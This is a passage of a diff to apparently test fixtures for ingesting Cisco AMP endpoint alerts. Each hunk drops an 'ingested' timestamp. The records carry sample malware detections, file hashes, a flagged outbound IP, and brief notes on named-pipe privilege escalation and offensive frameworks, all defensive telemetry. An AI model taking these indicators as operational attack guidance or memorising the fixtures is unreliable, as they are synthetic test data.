Attachment\u003c/a\u003e and other types of spearphishing are opened. 
Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", "severity": 4 
@@ -186,7 +185,6 @@ ], "code": "1090519054", "id": "6180352115244794000", - "ingested": "2022-02-02T05:52:24.688947538Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 2 
@@ -289,7 +287,6 @@ ], "code": "1090519054", "id": "6180351977805840000", - "ingested": "2022-02-02T05:52:24.688948581Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 2 
@@ -388,7 +385,6 @@ ], "code": "1090519054", "id": "6159258594551267000", - "ingested": "2022-02-02T05:52:24.688949419Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -489,7 +485,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688950235Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 
@@ -597,7 +592,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688951044Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 
@@ -705,7 +699,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688951881Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 
@@ -813,7 +806,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688952738Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 
@@ -921,7 +913,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688953553Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 
@@ -1029,7 +1020,6 @@ "action": "DFC Threat Detected", "code": "1090519084", "id": "6180341055704007000", - "ingested": "2022-02-02T05:52:24.688954360Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"67.43.156.12\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "severity": 3 
@@ -1125,7 +1115,6 @@ ], "code": "1107296274", "id": "1476910664322001000", - "ingested": "2022-02-02T05:52:24.688955178Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", "severity": 3, 
@@ -1207,7 +1196,6 @@ ], "code": "1090519054", "id": "6533671385032557000", - "ingested": "2022-02-02T05:52:24.688956181Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -1299,7 +1287,6 @@ ], "code": "1107296258", "id": "1489955900329000200", - "ingested": "2022-02-02T05:52:24.688957002Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "severity": 3, 
@@ -1379,7 +1366,6 @@ ], "code": "1090519054", "id": "6533670191031648000", - "ingested": "2022-02-02T05:52:24.688957820Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -1469,7 +1455,6 @@ ], "code": "1090519054", "id": "6533670191031648000", - "ingested": "2022-02-02T05:52:24.688958624Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -1555,7 +1540,6 @@ ], "code": "1090519054", "id": "6533670191031648000", - "ingested": "2022-02-02T05:52:24.688959435Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat 